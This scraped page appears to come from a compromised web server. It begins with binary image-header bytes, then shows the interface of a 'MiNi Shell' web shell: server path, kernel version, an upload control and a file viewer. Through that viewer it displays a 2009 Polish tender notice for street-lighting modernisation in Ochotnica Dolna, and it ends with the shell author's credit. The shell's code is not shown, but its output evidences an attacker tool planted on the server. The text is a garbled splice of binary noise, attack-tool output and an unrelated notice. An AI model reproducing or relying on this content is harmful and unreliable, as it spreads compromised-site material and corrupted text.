JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090409/99708-N-2009.html

<p class="kh_header"><b>Ochotnica Dolna: Modernizacja oświetlenia ulicznego Gminy Ochotnica Dolna</b><br>
<b>Numer ogłoszenia: 99708 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ochotnica Dolna , Osiedle Dłubacze 160, 34-452 Ochotnica Dolna, woj. małopolskie, tel. 018 262 09 10, faks 018 262 09 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ochotnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oświetlenia ulicznego Gminy Ochotnica Dolna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia
II.1.3.1 Zamówienie obejmuje  :
-	wymianę istniejących konstrukcji nośnych - wysięgniki, mocowania, haki
-	wymianę istniejących elementów zasilających i zabezpieczeń - przewody od granicy stron, skrzynki   bezpiecznikowe, bezpieczniki
-	wymianę  istniejących punktów świetlnych - oprawy i źródła światła w miejscach aktualnego zawieszenia
-	wyniesienie układów pomiaru energii i sterowania oświetleniem poza stacje transformatorowe i skrzynie stacyjne stacji transformatorowych napowietrznych
-	wymianę sterowania oświetleniem na sterowanie zegarami astronomicznymi
-	dobudowę punktów świetlnych na istniejących konstrukcjach wsporczych i w ramach istniejącego zasilania

Zakres prac dla poszczególnych miejscowości Gminy opisuje dokumentacja projektowa.

W skład dokumentacji projektowej wchodzi :
1.	opis techniczny
2.	szczegółowe tabele wykonawcze
3.	karty katalogowe i atesty
4.	przedmiary robót
5.	dokumentacja fotometryczna
6.	specyfikacja techniczna wykonania i odbioru robót ( STWiOR )

Dokumentacja fotometryczna wykonana została przy przestrzeganiu normy PN-EN-13201 (Oświetlenie dróg publicznych) i obejmuje wartości docelowe (przebudowa i uzupełnienie opraw) po zakończeniu drugiego etapu prac.
Dodatkowym dokumentem opisującym zakres przedmiotu zamówienia jest Specyfikacja Techniczna Wykonania i Odbioru Robót ( STWiOR ).

 II.1.3.2  Zakres rzeczowy wykonania przedmiotu zamówienia.

1.  Wymiana opraw i źródeł światła zgodnie z doborem oraz projektem fotometrycznym remontu i przebudowy oświetlenia w ilości  457 szt. 
	oprawa i źródło światła   50W		-   13      szt,
	oprawa i źródło światła   70W		-   199    szt,
	oprawa i źródło światła  100W		-   158    szt,
	oprawa i źródło światła  150W		-   87      szt,
2.  Wymiana przewodów zasilających  457kpl  (457 x 3m - przewód  YDY 2X2.5  750V ) 
3.  Wymiana zacisków prądowych Al.-Cu  np.SM1.11 - 457 szt
4.  Wymiana zabezpieczeń  na izolowane SV 19-25 lub BZO01 i  BZO 02 z wkładkami   
      BiWts 6A  - 457 szt
5.  Wymiana  wysięgników jednoramiennych na nowe ocynkowane w ilości - 457 szt
6. Dobudowa opraw i źródeł świata na istniejących konstrukcjach wsporczych sieci NN i w ramach istniejącego zasilania w ilości 50 szt (w tym: 30 szt w miejscach wskazanych w  tabelach szczegółowych czynności wykonawczych i 20 szt w miejscach wskazanych przez Zamawiającego w trakcie realizacji zadania)
	            oprawa i źródło światła   70W		-   18   szt,
	oprawa i źródło światła  100W		-   30   szt,
	oprawa i źródło światła  150W		-     2   szt,
7.  Podwieszenie po istniejących konstrukcjach wsporczych sieci NN przewodu typu 
     AsXSn 2x25mm2  - 2825m
8.  Dobudowę przewodów  zasilających - 50 kpl (50 x 3m - przewód  YDY 2X2.5  750V )  
9.  Dobudowę zacisków prądowych Al.-Cu  np.SM1.11 - 50 szt.
10.  Dobudowę zabezpieczeń  SV 19-25 lub  BZO 02 z wkładkami   
     BiWts 6A  - 50 szt.
11.  Dobudowę wysięgników jednoramiennych ocynkowanych w ilości - 50 szt
12. W celu zachowania skuteczności ochrony przeciwporażeniowej wysięgniki należy
       połączyć metalicznie z przewodem zerowym linii napowietrznej przewodem izolowanym 
      DY 1x6,0mm2   i zaciskiem prądowym Al.-Cu SM1.11 - 507 kpl.
13. Wyniesienie układów pomiaru energii i sterowania oświetleniem poza stacje 
     transformatorowe i skrzynie stacyjne stacji transformatorowych napowietrznych - 40 szt

Szczegółowe informacje zostały podane w tabelach czynności wykonawczych.

II.1.3.3 Do obowiązków Wykonawcy należeć będzie również ;
      -     organizacja placu budowy,
-	zabezpieczenie placu budowy przed dostępem osób trzecich,
-	prowadzenie robót budowlanych zgodnie z zasadami Kodeksu Pracy oraz przy przestrzeganiu zasad bhp, ochrony zdrowia i środowiska oraz ochrony przeciwpożarowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10.000,00 złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:
III.2.1.  posiadają uprawnienia do wykonywania działalności w zakresie objętym zamówieniem zgodnie z przepisami art. 14 ust. 1 ustawy z dnia 02 lipca 2004r o swobodzie działalności gospodarczej   ( Dz. U. Nr 173 poz. 1807 ),
III.2.2.  posiadają niezbędną wiedzę, doświadczenie, dysponują potencjałem technicznym gwarantującym wykonanie zamówienia oraz dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w tym względzie :
a. wykażą i udokumentują ( referencje) w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres, wykonanie minimum jednej  roboty budowlanej odpowiadających swoim rodzajem przedmiotowi zamówienia (remont, modernizacja, przebudowa, budowa oświetlenia ulicznego) - PKOB 2112.
b. dysponują osobami, które mogą być wyznaczone do pełnienia funkcji :
- Kierownika Budowy - z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych odpowiadające wymaganiom określonym w art.12 i 12a ustawy z dnia 7 lipca 1994r Prawo  Budowlane i doświadczenie w kierowaniu robotami o zakresie objętym zamówieniem,
- Kadra przewidywana do kierowania budową ( Kierownik Budowy) musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie ( uprawnienia ), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego, a jeżeli posiada uprawnienia wydane po 14 lutym 1995r - zaświadczenie lub decyzję o wpisie do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego.
- dysponują pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót tj. robotnicy o specjaliści instalacyjnej w zakresie sieci i instalacji elektrycznych potwierdzone zaświadczeniem SEP min. 1 kV,
III.2.3. Znajdują się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie robót w ustalonym terminie, i  w tym względzie posiadają ubezpieczoną działalność gospodarczą od OC - min. suma ubezpieczenia w zakresie wykonywania działalności odpowiadającej przedmiotowi zamówienia na kwotę nie niższą niż 900 000 zł.
III.2.4 . Nie podlegają wykluczeniu w rozumieniu art.24 ustawy Prawo Zamówień Publicznych,
III.2.5.  Podmioty wspólnie ubiegające się o udzielenie zamówienia publicznego i które wspólnie zamierzają składać wniosek o dopuszczenie do udziału w postępowaniu, a następnie składać ofertę muszą wykazać, że :
III.2.5.1 - każdy z osobna :
- nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy P.z.p. z dnia 29 stycznia 2004 r.(t.j. z 2007 r. Dz.U. Nr 223, poz.1655, z późniejszymi zmianami).
- posiadają uprawnienia do występowania w obrocie prawnym,
- posiadają ubezpieczoną działalność gospodarczą od odpowiedzialności cywilnej,
III.2.5.2-wspólnie muszą wykazać, że :
- posiadają uprawnienia do wykonywania czynności przewidzianych do zrealizowania przedmiotu zamówienia ( uprawniania budowlane ),
- dysponują odpowiednim sprzętem technicznym,
- dysponują odpowiednim personelem do wykonania zamówienia.
III.2.5.3- przynajmniej jeden z wykonawców musi wykazać, że : posiada wiedzę i doświad-
czenie wymagane przez Zamawiającego,
III.2.6. Zadeklarują udzielenie :
III.2.6.1. pisemnej gwarancji na okres :
       36  miesięcy na wykonane prace instalacyjno - montażowe,
       36 miesięcy na oprawy oświetleniowe,
       36 miesięcy na  pozostałe urządzenia użyte w modernizacji z wyjątkiem źródeł światła, 12 miesięcy na źródła światła, liczony od dnia odbioru przedmiotu umowy dla przedmiotu umowy,
III.2.6.2.rękojmi na okres 36 miesięcy liczony od dnia odbioru przedmiotu umowy dla przedmiotu umowy,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Ocena spełnienia warunków wymaganych od Oferentów :
Zamawiający dokona sprawdzenia spełnienia przez Oferentów wymogów określonych w ustawie - Prawo zamówień publicznych i specyfikacji w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją. Zamawiający informuje, iż sprawy doświadczenia, referencji, stanu zatrudnienia, polis ubezpieczeniowych rozpatrywane będą łącznie - w przypadku składania ofert wspólnych. 
2. W zakresie posiadania uprawnień do wykonywania określonej działalności i nie podlegania wykluczeniu na podstawie art. 24 Pzp  pod uwagę będą brane oferty, w których udokumentowano  zgodność prowadzonej działalności gospodarczej z zakres objętym przedmiotem zamówienia .
3. Zamawiający zastrzega sobie prawo szczegółowego sprawdzenia stanu faktycznego z przedłożonymi dokumentami, w tym również poprzez wezwanie Oferenta do wyjaśnienia treści dokumentów.
4. Zamawiający wzywa Oferentów, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25, ust.1 Pzp, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których  mowa w art. 25, ust. Pzp zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa  do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia  oferta Oferenta podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny  potwierdzać spełnianie przez Oferenta warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.

Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu : 

A. OŚWIADCZENIA :
Oświadczenie o spełnianiu warunków art.22 ustawy Prawo Zamówień Publicznych.
W przypadku złożenia oferty wspólnej - oświadczenie że podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

B. DOKUMENTY (potwierdzające spełnienie warunków, o których mowa w art.22, ust.1 ustawy Prawo zamówień publicznych) :

1.   Kserokopia dokumentu potwierdzającego wniesienie - wpłacenie wadium.
2. Kserokopia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do 
       ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed 
       upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta. 
      W przypadku Oferenta będącego Spółką Cywilną obowiązuje załączenie umowy spółki. 
      W przypadku Oferentów wspólnie ubiegających się o udzielenie zamówienia zgodnie art.23 
       ustawy Pzp obowiązuje załączenie umowy regulującej współpracę tych podmiotów. 
3.   Doświadczenie w zakresie realizacji remontów, modernizacji, przebudowy oraz budowy 
       instalacji oświetleniowych dróg i ulic w latach  2004/2005/2006/2007/2008 zaliczanych do klasy 
       2112 Polskiej Klasyfikacji Obiektów Budowlanych z  zakresu odpowiadających przedsięwzięciu 
       będącemu przedmiotem zamówienia .
4.   Kwalifikacje techniczne.
5.   Wykaz osób i podmiotów przewidzianych do realizacji zamówienia (wg załączonego wzoru).
6.   Kserokopia uprawnień zawodowych  kierownika budowy w specjalności instalacje w zakre-
      sie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych poświadczona za zgodność
       z oryginałem przez Oferenta,
7.  Kserokopia zaświadczenia właściwego oddziału Izby Inżynierów  Budownictwa potwierdzające 
       przynależność  kierownika budowy do Izby na dzień składania ofert, poświadczona za 
       zgodność  z  oryginałem przez Oferenta.
8.    Kserokopie dokumentów potwierdzających prawidłowe wykonanie w latach 
       2004/2005/2006/2007/2008 remontów, modernizacji, przebudowy oraz budowy instalacji 
      oświetleniowych dróg i ulic z zakresu odpowiadających przedsięwzięciu będącemu przedmiotem 
      zamówienia poświadczone za zgodność z  oryginałem przez Oferenta.
9.    Ubiegające się o zamówienie publiczne spółki z o.o. muszą przedłożyć uchwałę wspólników 
       upoważniającą  do zaciągnięcia zobowiązania lub umowę spółki, o ile wartość zamówienia 
      dwukrotnie przekracza wartość kapitału spółki ( art.230 Kodeksu Spółek ).
10.    Kserokopia polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Oferent jest 
         ubezpieczony od odpowiedzialności cywilnej , w zakresie działalności będącej przedmiotem   
         zamówienia publicznego (budownictwo) o wartości nie mniejszej niż  900.000,00 PLN.
11.    Harmonogram rzeczowo-finansowy.  
12.    Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są złożyć do oferty pełnomocnictwo udzielone przez wszystkich partnerów do reprezentowania ich w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w formie oryginalnej lub kopii potwierdzonej przez osobę upoważnioną - notariusza.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ochotnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ochotnica Dolna, 34-452 Osiedle Dłubacze 160 (pokój nr 11 - I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 08:45, miejsce: Sekretariat Urzędu Gminy Ochotnica Dolna,  w 34-451 Ochotnica Dolna - Osiedle Dłubacze 160,  (II piętro - pokój nr 17).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com